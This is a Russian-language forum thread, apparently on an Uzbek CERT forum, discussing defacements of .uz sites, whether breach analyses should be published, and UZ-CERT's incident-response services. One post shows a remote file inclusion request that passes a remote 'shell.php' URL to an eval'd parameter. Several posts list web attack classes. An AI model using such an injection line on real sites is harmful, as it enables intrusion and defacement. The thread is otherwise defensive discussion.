Взломы в зоне .UZ
 

Народ, разместите сюда информации о взломанных сайтах с анализами взлома. Надеюсь, это будеть всем полезно, особенно для не профессионалам по безопасности.

Недавно взломаны сайт Каракалпакстан-онлайн: kr.uz и его форум с 19 летного взломщика из России. Модераторы сказали, что атака устроена через опрос-форма сайта. Если у Вас еще какие то инфы, пишите плиз...

Это приватная информация, мне кажется, никто не заинтересован в том, чтоб его сайт выставляли с "дырами". Хватает списка зараженых сайтов.

каждый день сколько сайтов заряжается в узнете? помоему максимум 5. если каждый день разместим списка, это не будеть бесполезно. да, сайты хватает, но анализы взлома почти нету.

Есть статьи, новости, бактрек на cert.uz. Там можно читать. А анализы выкладывать в паблик вам никто не даст. Это потенциальная очередная угроза для сайт, а так же его престиж, рейтинг. Администраторы сайтов уведомляются о том, что у них есть "дыры", исправляют.

Анализом взломов, угроз и уязвимостей ежедневно занимается соответствующая группа Службы UZ-CERT. В случае обращения в Службу UZ-CERT по вопросам компьютерных инцидентов проводится работа по выявлению источника угрозы, методов несанкционированного доступа и проникновения в систему, выявляются деструктивные действия произведенные злоумышленниками, анализируются системные журналы и события и т.д. Вся информация полученная в процессе работы является конфиденциальной и не подлежит огласке третьей стороне. Отчет об анализе с рекомендациями получает непосредственнно владелец ресурса.

На каких условиях вы осуществляете эту работу? У нас возникла необходимость в выявлении уязвимостей eduportal.uz, а также предотвращении попыток несанкционированного доступа и проникновения в систему.

Вы хотите чтобы на форуме Узинфокома публиковались руководства для Хакеров?

Хм...
- Знаешь как узбекские сайты ломают?
- Нет
- Пойдем покажу, потом сами попробуем...

не хотелось создать новую тему !
можно ли создать сайты посвешоные комп безопасности ну в росии есть типа zloy.ru...ну у них еще дефейс ленты есть! их владельсов и пользователей не трогают у нас тоже так? или нельзя?

Не совсем так - если сайт дефейснули - значит, он заметен и интересен - проходные бездарные сайты не трогают.

И в большинстве случаев атакующие оставляют запись типа - "Админ, обрати внимание на порт такой-то или дыру там-то" - то есть, подсказывают, где и что не закрыто. Благородно так...
Писал об этом большую статью - есть на сайте журнала.

Вы ошибаетесь.

Как-то 60 сайтов дефейснули ребята, даже не знавшие, где находится Узбекистан.

Это был один из вариантов развития ситуации. Имевших место быть ;-)

Что? То, что Вы ошибаетесь, это один из вариантов развития ситуации? Имевшего место быть?

ИМХО
Можно,но не как zloy. Правила не позволяют. Там не только безопасность, но и хакинг, варез.
Вот электронный журнал по информационной безопасности http://www.security.uz/

Бред... на счет вареза вы обсалютно правы.. но на счет хакинга нет...
Как учится людям IT, если не иметь понятия что такое хакинг ?
В зоне Уз более 50% сайтов подверженные атаке... и кто в этом виноват ?
программисты.. которые не знают все уловки и не могут мыслить как хакеры.
Те кто используют Хак в противозаконных целях меня бесят... но те кто задумываются над тем что это не только плохо и противозаконно... но так же и то что они портят жизнь номральным людям...

Мое мнение... в сети Уз должен быть хоть один сайт про Хакинг... что бы люди читали статьи о взломах и понимали что это плохо.. лучше всего помогать другим и докладывать о каждой ошибке....

Если я не прав, поправьте меня...

Вы ошибаетесь. ©Eldar Ishimbaev
И вообще, что вы подразумеваете под словом "хак"?
У нас наверное совсем разные понятия.
Фильмы про хакеров меньше смотреть надо
Не буду с Вами спорить, судя по вашему сообщению толку нет.

Что я подразумиваю под словом Хак ? вы подумайте, может поймете, прочитайте еще раз мое сообщение...

Да что вы ? а что в моем сообщении не так ? я могу сейчас написать простейший уязвимый скрипт и привести пример что в начале нужно понять логику хакеров а потом уже защищать программы...
И если можно объясните что вы имели в виду под предложением
судя по вашему сообщению


А на счет фильмов про хакеров... может кто то и смотрит в надежде чему либо научится... я не из их числа xD

Надеюсь уязвимых ошибок в словах не оставил... =)))))

Вообще-то подавляющее большинство сайтов в зоне uz работают на разнообразных CMS, вордпрессах, джумлах и подобных вещах - а эксплоиты, юзающие их ошибки - не редкость. Как-раз таки простенький самописный движок сложней поломать - непопулярен его исходный код, и в нем нет лишних функций. У многих в админке хостера вообще пароли простые.
Зачем? Он не сразу догонит ресурсы по секьюрити в зоне ru и тем более, в доткоме, соответственно, загнется. Было дело.
Этим вы приведете пример своего незнания языка. Логика хакеров (тем более "кулхацкеров", качающих с ксакепа эксплоиты) тут ни при чем. Вначале нужно понять конструкцию и логику вебсервера и запомнить элементарные, но надежные методы защиты от SQL-иньекций. В 98% случаев этого вполне достаточно.

Я думаю тема правильная. Обсуждать и исправлять на будущее это лучше, чем потом сопли жувать)

С чего вы взяли что если я приведу пример то покажу всем свою безграмотность в PHP ?
Один раз ко мне постучался знакомый, PHP занимается 3 года, попросил нарисовать и сверстать шаблон под главную...
Но как только я глянул в код, я ахнул!!!!

он решил засунуть переменную под евал
Один запрос
http://test.ru/index.php?test=http://xak/shell.php
Вот вам и самописные двиги которые трудно ломать =D

А на счет что если закрыть SQL Inj и все беды решены вы очень сильно заблуждаетесь....
SQL INJ
PHP INJ
XSS все виды
Не защищеные поля веб форм
Раскрытие путей
и прочии ошибки...

И что вам это даст ?
У веб серверов логики не какой нету, это искусственный разум =)
Максимум что вы сможете сделать на веб сервере это урезать права на выполнение скриптов, а дырки то все равно останутся, и заметьте новые фильтры на обход защиты появляются все чаще и чаще.

Интересно получается - людям больше интересно не как защитить сайт, а как его могут сломать :)
Сломать могут по разному - нет универсальной защиты.
Если програмист грамотный и админ не ленивый - то школяры уже не сломают, только профи - но какому профи будет интересен узбекский сайт ? Имхо ИКТ в нашей стране еще настолько не развит что получить выгоду от "ломки" никто не сможет, а профи ради спортивного интереса не ломают.
Тем паче что сейчас Китай дает такие ресурсы и мощности, что даже дидосеры перестали ломать обычные сайты. Если не лень - обычно все стараются банить весь китайский диапазон адресов - обычно лезут оттуда, а обывателю из Китая - нечего делать на наших сайтах.

Не думаю что такой ресурс нужен. И без него навалом баг трекеров и прочего. В общей сложности методы взлома однообразны, достаточно почитать общие статьи на эти темы коих в нете навалом и применить их к своим реалиям, а также внимательно следить за баг трекерами используемого программного обеспечения, и не ленится что-то делать, ужасно много взломов из за элементарной лени (не стали дописывать пару строчек кода для проверки, админ поленился досконально настроить права и т.д.). В 90% случаев этого будет достаточно. А другим 10% как уже было сказано Узбекистан нафиг не нужен.

Оффтоп:

ерунда, это можна писать как и для одминов, да и руководства для хакеров, можна найти где угодно, а опытом (не хакерским, а из анализа исходящего - одминским) поделиться я считаю можна

Оффтоп:

чушь, за жопу горло возьмут сразу, и не узнают где могилка твоя

я извеняюсь это все делается за Ваш счет?я просто не в курсе, или Вы тут рекламу сделали? =)

Не понял Вашего вопроса. С деятельностью Службы UZ-CERT можете ознакомиться здесь.

С деятельностью Службы UZ-CERT ознакомился...спасибо.
Значит ли это, что я звоню вам и говорю: "Я купил то такой то домен, взоне uz хачу повесить сайт, что мне нужно предпринять чтобы его не "хакнули"", а Вы мне собственно отвечаете:"То то и то то" или вы сами в процессе анализа зоны уз, после того как я сайтец повесил, говорите мне: "Ваш сайт подвержен риску атаки!!!Сделайте то то, то то"??

Оффтоп:

Вам бы в НУУЗе нейронные сети и искусственный интелект преподавать, спросите Николая Александровича

Оффтоп:

не бейте меня, обращение не к вам а риторическое

а сказано это былы к тому, что суть диалога вашего - просто напросто набор слов из головы, и если ВЫ действительно считаете,
что два 15-летних пацана (а других кулхацкеров у нас нет), завидут такой вот диалог начитавшись этой ветки, то я и говорю, что это чушь!

Оффтоп:

или Вы сами заведете, такой вот диалог?? тогда канешна, я глубоко извеняюсь за все что писалось раньше, потому как -да, тогда это можно принять на свой счет

А суть Вашего диалога другая, Вы слова не из головы берете? :) Из другого места какого-то?

Причем тут "15-летние пацаны" и "кулхацкеры". Моя фраза была ответом на просьбу "Народ, разместите сюда информации о взломанных сайтах с анализами взлома".

Я не знаю кто такие "кулхацкеры", есть ли они у нас в стране и каков их возростной состав. Тем более я не знаю, какие разговоры они могут вести.

Оффтоп:

заценил =)

ну тогда суть этой фразы в студию, потому как я значица неправильно ее истолковал..

Если Вас интересует что-то конкретное, либо Вы хотите получить совет или рекомендации по используемому Вами ПО, можете обращаться посредством электронной почты, создав тему в ветке UZ-CERT на данном форуме, или позвонив по телефонам. Все контакты есть у нас на сайте. По мере возможности постараемся помочь. Что касается работающих ресурсов в зоне .UZ, то как раз для владельцев таких ресурсов нами была открыта программа UZ-CERTified. Зарегистрироваться в данной программе может владелец ресурсов в доменной зоне UZ. После чего его ресурс будет проверен на наличие угроз ИБ, а также будет доступен ряд других сервисов. Подробнее о программе UZ-CERTified можете узнать здесь. Помимо этого, сотрудниками Службы UZ-CERT периодически проводится мониторинг ресурсов в доменной зоне UZ на наличие угроз ИБ и вредоносных ссылок. Подробнее в этой теме.

Дефейс joomla.uz
 

Дефейс joomla.uz
Собственно сабж, уже не первый месяц так стоит как я понял.

Вот по теме:
JOOMLA.UZ HACKED BY E404 a.k.a N0FAC3
http://www.youtube.com/watch?v=UW0A1rY_qY8
Видео загружено 06.05.2011

Наверняка нашли дыру в устаревшей версии движка. Обновляться вовремя надо...

http://womenfootball.uz/ тоже. Руки им поотрывать!